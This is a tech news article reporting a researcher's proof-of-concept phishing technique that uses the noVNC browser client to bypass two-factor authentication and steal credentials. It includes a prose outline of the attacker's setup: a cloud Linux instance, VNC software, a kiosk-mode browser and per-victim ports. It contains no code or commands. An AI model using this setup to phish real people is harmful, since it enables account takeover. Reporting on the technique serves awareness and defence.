IT Pro is supported by its audience. When you purchase through links on our site, we may earn an affiliate commission. Learn more

Novel phishing method deceives users with ubiquitous IT support tool

The man-in-the-middle attack can be used for a range of nefarious purposes, including credential theft and malicious code injection

A cyber security researcher has documented a novel phishing technique that involves cyber criminals harnessing virtual network computing (VNC) technology on a private server to launch a variety of attacks.

Using the open source noVNC client, the phishing technique allows successful attackers to launch malicious code into a victim’s browser, plant a keylogger, and passively observe all user activity.

The researcher, who goes by the name mr.d0x. claims the method of attack bypasses two-factor authentication (2FA), including Google’s 2FA protocol used for the likes of Gmail and Google accounts, and facilitates the stealing of credentials. 

The phishing method effectively acts as a VNC client for the attacker to remotely monitor and access a user’s environment, creating a man-in-the-middle (MITM) attack.

The technology is common in modern businesses, with employees being familiar with IT support teams accessing their computers remotely to resolve technical issues. 

The initial deception is achieved in a typical phishing format - a strategically crafted email provides a link the user needs to click on. Once clicked, the user is taken to a direct server run by the attacker, rather than a malicious web page.

The attack can be launched against individuals using any browser, theoretically including ones on mobile devices, though the researcher said they had difficulty in executing the attack on smartphones

There are some shortcomings with the method, the researcher said, including the issue whereby the attacker has to provide control of their machine to the victim in order for the attack to work.

It’s also possible that given the nature of VNC software, there may be some noticeable input lag for the victim, offering an indication that the website is not legitimate.

This is currently a proof of concept style of phishing attack with no known actively exploited cases in the wild, though remote access to businesses is reportedly on the rise in a string of burgeoning dark web operations.

“Browsers are more powerful than ever and the usage of browsers as clients for remote access provides new ways for attackers to steal credentials, bypass 2FA, and more,” said the researcher. “I strongly believe that what I’ve demonstrated in this article is only a small portion of what this technique can be used for.”

noVNC attack breakdown

The attacker first needs to deploy a Linux machine via a cloud service provider; any provider or Linux distro is fine. Firefox is good for this, the researcher said, but any browser with a kiosk mode will also work.

Related Resource

The best defence against ransomware

How ransomware is evolving and how to defend against it

Blue padlock Free download

Once the Linux instance is up and running, the attacker then needs to install VNC software such as TightVNC or TigerVNC before running some custom commands to ensure the environment is correctly configured for the attack. The noVNC javascript library and application can then be downloaded from GitHub and installed too.

A web browser needs to be running in the deployment and displaying the authentication page from which the attacker wants to steal credentials, such as Google’s login page. The attacker can use any browser, Firefox is good here, but it must be running in kiosk mode. 

This technique is effective in spear phishing campaigns but will encounter issues if sent to multiple targets since they will be sharing the same VNC session. 

However, the technique can be modified and automated so different users access different VNC sessions by assigning users to different ports.

Featured Resources

Activation playbook: Deliver data that powers impactful, game-changing campaigns

Bringing together data and technology to drive better business outcomes

Free Download

In unpredictable times, a data strategy is key

Data processes are crucial to guide decisions and drive business growth

Free Download

Achieving resiliency with Everything-as-a-Service (XAAS)

Transforming the enterprise IT landscape

Free Download

What is contextual analytics?

Creating more customer value in HR software applications

Free Download

Recommended

Education and government most at risk from email threats
phishing

Education and government most at risk from email threats

26 Nov 2021
Attackers use CSS to fool anti-phishing systems
phishing

Attackers use CSS to fool anti-phishing systems

11 Nov 2021
Senate report slams agencies for poor cyber security
cyber security

Senate report slams agencies for poor cyber security

3 Aug 2021
Most employees put their workplace at risk by taking cyber security shortcuts
cyber security

Most employees put their workplace at risk by taking cyber security shortcuts

27 Jul 2021

Most Popular

16 ways to speed up your laptop
Laptops

16 ways to speed up your laptop

13 May 2022
Europe's first autonomous petrol station opens in Lisbon
automation

Europe's first autonomous petrol station opens in Lisbon

23 May 2022
Linux-based Cheerscrypt ransomware found targeting VMware ESXi servers
ransomware

Linux-based Cheerscrypt ransomware found targeting VMware ESXi servers

26 May 2022